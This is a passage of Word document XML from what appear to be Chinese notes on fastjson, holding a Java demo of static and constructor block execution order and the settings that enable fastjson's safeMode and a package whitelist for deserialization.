          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B896517" w14:textId="7B18880D" w:rsidR="00DB229F" w:rsidRPr="00DB229F" w:rsidRDefault="00476B1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>taticDemo.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69481F" w14:textId="77777777" w:rsidR="00476B1F" w:rsidRDefault="00476B1F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>org.example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">StaticDemo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">static </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构造代码块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>StaticDemo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构造函数被触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF7F5D" w14:textId="77777777" w:rsidR="00DB229F" w:rsidRPr="00476B1F" w:rsidRDefault="00DB229F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69280724" w14:textId="77777777" w:rsidR="00C93FF2" w:rsidRDefault="00C93FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB1401A" w14:textId="77777777" w:rsidR="00AB3E74" w:rsidRDefault="00AB3E74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4980C624" w14:textId="62D35408" w:rsidR="009B2BF0" w:rsidRDefault="00CB710B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>safemode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B2A4B" w14:textId="77777777" w:rsidR="009967E1" w:rsidRPr="001A19F6" w:rsidRDefault="009967E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BE21D8" w14:textId="5003B8D1" w:rsidR="002142CA" w:rsidRDefault="00C70908" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED8D2E" w14:textId="627D3B1C" w:rsidR="002142CA" w:rsidRDefault="000C10CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000C10CB">
        <w:t>ParserConfig.getGlobalInstance().setSafeMode(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B07BE" w14:textId="77777777" w:rsidR="00C70908" w:rsidRDefault="00C70908" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8451E6" w14:textId="34614703" w:rsidR="00C70908" w:rsidRDefault="002F4B92" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E025E5F" w14:textId="77777777" w:rsidR="002F4B92" w:rsidRDefault="002F4B92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7812D5E9" w14:textId="12E3FDDD" w:rsidR="002F4B92" w:rsidRDefault="0072566D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0072566D">
        <w:t>-Dfastjson.parser.safeMode=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AFE2C" w14:textId="77777777" w:rsidR="002F4B92" w:rsidRPr="002F4B92" w:rsidRDefault="002F4B92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2527D627" w14:textId="47EEBF42" w:rsidR="00C70908" w:rsidRDefault="00045633" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00045633">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00045633">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件进行配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229DFCA" w14:textId="64332E54" w:rsidR="00250696" w:rsidRPr="00250696" w:rsidRDefault="00DB776D" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/alibaba/fastjson/wiki/fastjson_safemode_en</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EA64A58" w14:textId="62D62DE1" w:rsidR="002142CA" w:rsidRPr="002142CA" w:rsidRDefault="00045633" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00045633">
        <w:t>fastjson.parser.safeMode=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBB4CD2" w14:textId="77777777" w:rsidR="002142CA" w:rsidRPr="00586037" w:rsidRDefault="002142CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0408C014" w14:textId="4B51B7F4" w:rsidR="00586037" w:rsidRDefault="00586037" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00586037">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用白名单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67647E3A" w14:textId="77777777" w:rsidR="00E32467" w:rsidRDefault="00E32467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066E80AE" w14:textId="63B1F421" w:rsidR="00E32467" w:rsidRDefault="00E32467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大佬</w:t>
      </w:r>
      <w:r w:rsidR="00A7621C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00A7621C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跑的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑名单：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E32467">
        <w:t>https://github.com/LeadroyaL/fastjson-blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB0A66" w14:textId="77777777" w:rsidR="00E32467" w:rsidRPr="00E32467" w:rsidRDefault="00E32467" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2344FACB" w14:textId="23732E93" w:rsidR="005C1BCE" w:rsidRDefault="00970D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D5C98F" w14:textId="77777777" w:rsidR="009E037D" w:rsidRDefault="009E037D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2AC921" w14:textId="5F04FCCB" w:rsidR="003C6CAF" w:rsidRDefault="003C6CAF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制反序列化的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javabean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFB7DC" w14:textId="4723AC58" w:rsidR="00970D0A" w:rsidRDefault="00071204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00071204">
        <w:lastRenderedPageBreak/>
        <w:t>ParserConfig.getGlobalInstance().addAccept(“com.taobao.pac.client.sdk.dataobject.,com.cainiao.”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9F1D2" w14:textId="77777777" w:rsidR="00071204" w:rsidRDefault="00071204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
